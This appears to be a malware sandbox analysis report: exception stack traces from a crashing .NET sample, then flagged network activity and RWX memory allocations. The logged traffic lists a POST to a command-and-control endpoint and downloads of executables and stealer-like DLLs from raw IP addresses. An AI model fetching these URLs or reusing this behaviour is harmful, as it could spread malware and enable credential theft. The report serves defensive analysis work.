__exception__ Jan. 5, 2024, 7:50 a.m.	stacktrace: 0x6d6a408 0x6d6bdfb 0x6d6b8e0 0x6d6608d 0x6d65a72 0x6d6497d 0x918177 0x9129ed 0x9124fe 0x9106ce 0x910160 0x9100f3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70852652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7086264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70862e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x709174ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x70917610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x709a1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x709a1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x709a1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x709a416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7188f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x71a07f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x71a04de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6d6a44b registers.esp: 3860328 registers.edi: 3860628 registers.eax: 0 registers.ebp: 3860336 registers.edx: 0 registers.ebx: 3862628 registers.esi: 43023908 registers.ecx: 44679208	1
__exception__ Jan. 5, 2024, 7:50 a.m.	stacktrace: 0x6d6a408 0x6d6bdfb 0x6d6b8e0 0x6d6608d 0x6d65a72 0x6d6497d 0x918177 0x9129ed 0x9124fe 0x9106ce 0x910160 0x9100f3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70852652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7086264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70862e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x709174ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x70917610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x709a1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x709a1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x709a1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x709a416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7188f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x71a07f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x71a04de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6d6a44b registers.esp: 3860328 registers.edi: 3860628 registers.eax: 0 registers.ebp: 3860336 registers.edx: 0 registers.ebx: 3862628 registers.esi: 43023908 registers.ecx: 46078592	1
__exception__ Jan. 5, 2024, 7:50 a.m.	stacktrace: 0x6d6a408 0x6d6c28d 0x6d6bf38 0x6d66075 0x6d65b5f 0x6d6497d 0x918177 0x9129ed 0x9124fe 0x9106ce 0x910160 0x9100f3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70852652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7086264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70862e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x709174ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x70917610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x709a1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x709a1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x709a1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x709a416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7188f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x71a07f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x71a04de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6d6a44b registers.esp: 3860412 registers.edi: 3860628 registers.eax: 0 registers.ebp: 3860420 registers.edx: 0 registers.ebx: 3862628 registers.esi: 43023908 registers.ecx: 47478224	1
__exception__ Jan. 5, 2024, 7:50 a.m.	stacktrace: 0x6d6a408 0x6d6c28d 0x6d6bf38 0x6d6608d 0x6d65b5f 0x6d6497d 0x918177 0x9129ed 0x9124fe 0x9106ce 0x910160 0x9100f3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70852652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7086264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70862e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x709174ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x70917610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x709a1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x709a1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x709a1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x709a416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7188f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x71a07f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x71a04de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6d6a44b registers.esp: 3860412 registers.edi: 3860628 registers.eax: 0 registers.ebp: 3860420 registers.edx: 0 registers.ebx: 3862628 registers.esi: 43023908 registers.ecx: 43988904	1
__exception__ Jan. 5, 2024, 7:50 a.m.	stacktrace: 0x6d6a408 0x6d6c28d 0x6d6bf38 0x6d6608d 0x6d65b5f 0x6d6497d 0x918177 0x9129ed 0x9124fe 0x9106ce 0x910160 0x9100f3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70852652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7086264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70862e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x709174ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x70917610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x709a1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x709a1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x709a1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x709a416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7188f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x71a07f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x71a04de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6d6a44b registers.esp: 3860412 registers.edi: 3860628 registers.eax: 0 registers.ebp: 3860420 registers.edx: 0 registers.ebx: 3862628 registers.esi: 43023908 registers.ecx: 45390960	1
__exception__ Jan. 5, 2024, 7:50 a.m.	stacktrace: 0x6d6a408 0x6d6d1dc 0x6d6c9cd 0x6d649ab 0x918177 0x9129ed 0x9124fe 0x9106ce 0x910160 0x9100f3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70852652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7086264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70862e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x709174ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x70917610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x709a1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x709a1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x709a1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x709a416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7188f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x71a07f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x71a04de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6d6a44b registers.esp: 3860952 registers.edi: 3861200 registers.eax: 0 registers.ebp: 3860960 registers.edx: 0 registers.ebx: 3862628 registers.esi: 45948580 registers.ecx: 45955760	1
__exception__ Jan. 5, 2024, 7:50 a.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x70a01194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x708d2ba1 mscorlib+0x36dd51 @ 0x6d99dd51 mscorlib+0x32fea6 @ 0x6d95fea6 mscorlib+0x30ab40 @ 0x6d93ab40 0x91c26a 0x6d671ed 0x6d6cef1 0x6d6c9cd 0x6d649ab 0x918177 0x9129ed 0x9124fe 0x9106ce 0x910160 0x9100f3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70852652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7086264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70862e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x709174ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x70917610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x709a1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x709a1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x709a1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x709a416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7188f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x71a07f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x71a04de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 3860448 registers.edi: 0 registers.eax: 3860448 registers.ebp: 3860528 registers.edx: 0 registers.ebx: 103437512 registers.esi: 7683224 registers.ecx: 123022150	1
__exception__ Jan. 5, 2024, 7:50 a.m.	stacktrace: 0x953ddd 0x953c66 0x9525fb 0x952226 0x9506ce 0x950160 0x9500f3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x70852652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7086264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x70862e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x709174ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x70917610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x709a1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x709a1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x709a1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x709a416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7188f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x71a07f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x71a04de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x953ed0 registers.esp: 1698508 registers.edi: 1698560 registers.eax: 0 registers.ebp: 1698572 registers.edx: 5843248 registers.ebx: 1699668 registers.esi: 42557684 registers.ecx: 0	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (14 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.215.113.68/theme/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.21/mine/nocry.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.21/lend/golden.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.21/lend/pixelguy.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.21/lend/YT.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.68/theme/Plugins/cred64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.21/lend/MRK.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.21/lend/macheri.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.68/theme/Plugins/clip64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.21/lend/bakhtiar.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://5.42.66.0/newrock.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.21/lend/flesh.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://91.92.254.7/scripts/plus.php?ip=175.208.134.152&substr=seven&s=ab
suspicious_features	Connection to IP address	suspicious_request	GET http://185.172.128.53/syncUpd.exe

Performs some HTTP requests (31 events)

request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	POST http://185.215.113.68/theme/index.php
request	GET http://77.91.68.21/mine/nocry.exe
request	GET http://77.91.68.21/lend/golden.exe
request	GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request	GET http://77.91.68.21/lend/pixelguy.exe
request	GET http://77.91.68.21/lend/YT.exe
request	GET http://185.215.113.68/theme/Plugins/cred64.dll
request	GET http://77.91.68.21/lend/MRK.exe
request	GET http://77.91.68.21/lend/macheri.exe
request	GET http://185.215.113.68/theme/Plugins/clip64.dll
request	GET http://77.91.68.21/lend/bakhtiar.exe
request	GET http://5.42.66.0/newrock.exe
request	GET http://77.91.68.21/lend/flesh.exe
request	GET http://api.ipify.org/?format=ewf
request	GET http://91.92.254.7/scripts/plus.php?ip=175.208.134.152&substr=seven&s=ab
request	GET http://185.172.128.53/syncUpd.exe
request	GET https://www.youtube.com/
request	GET https://www.youtube.com/supported_browsers?next_url=https%3A%2F%2Fwww.youtube.com%2F
request	GET https://fonts.googleapis.com/css?family=YouTube+Sans:500
request	GET https://fonts.googleapis.com/css?family=Roboto:400,500
request	GET https://www.youtube.com/img/desktop/supported_browsers/yt_logo_rgb_light.png
request	GET https://www.youtube.com/img/desktop/supported_browsers/chrome.png
request	GET https://www.youtube.com/img/desktop/supported_browsers/dinosaur.png
request	GET https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu4mxM.woff
request	GET https://www.youtube.com/img/desktop/supported_browsers/opera.png
request	GET https://fonts.gstatic.com/s/youtubesans/v23/Qw3hZQNGEDjaO2m6tqIqX5E-AVS5_rSejo46_PCTRspJ0OosolrBEJL3HMXfxQASluL2m_dANVawBpSF.woff
request	GET https://www.youtube.com/img/desktop/supported_browsers/edgium.png
request	GET https://www.youtube.com/img/desktop/supported_browsers/firefox.png
request	GET https://www.youtube.com/favicon.ico
request	GET https://ipinfo.io/widget/demo/175.208.134.152

Sends data using the HTTP POST Method (1 event)

request

POST http://185.215.113.68/theme/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 1232 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 1880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 1880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fb1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ec1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c31000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e81000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75ab1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 region_size: 7409664 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02790000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ea0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7561c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7563c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7561c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7563c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74753000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x747f7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76af9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75ac2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75602000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73db1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73dc1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76d71000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02970000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ce1000 process_handle: 0xffffffff	1
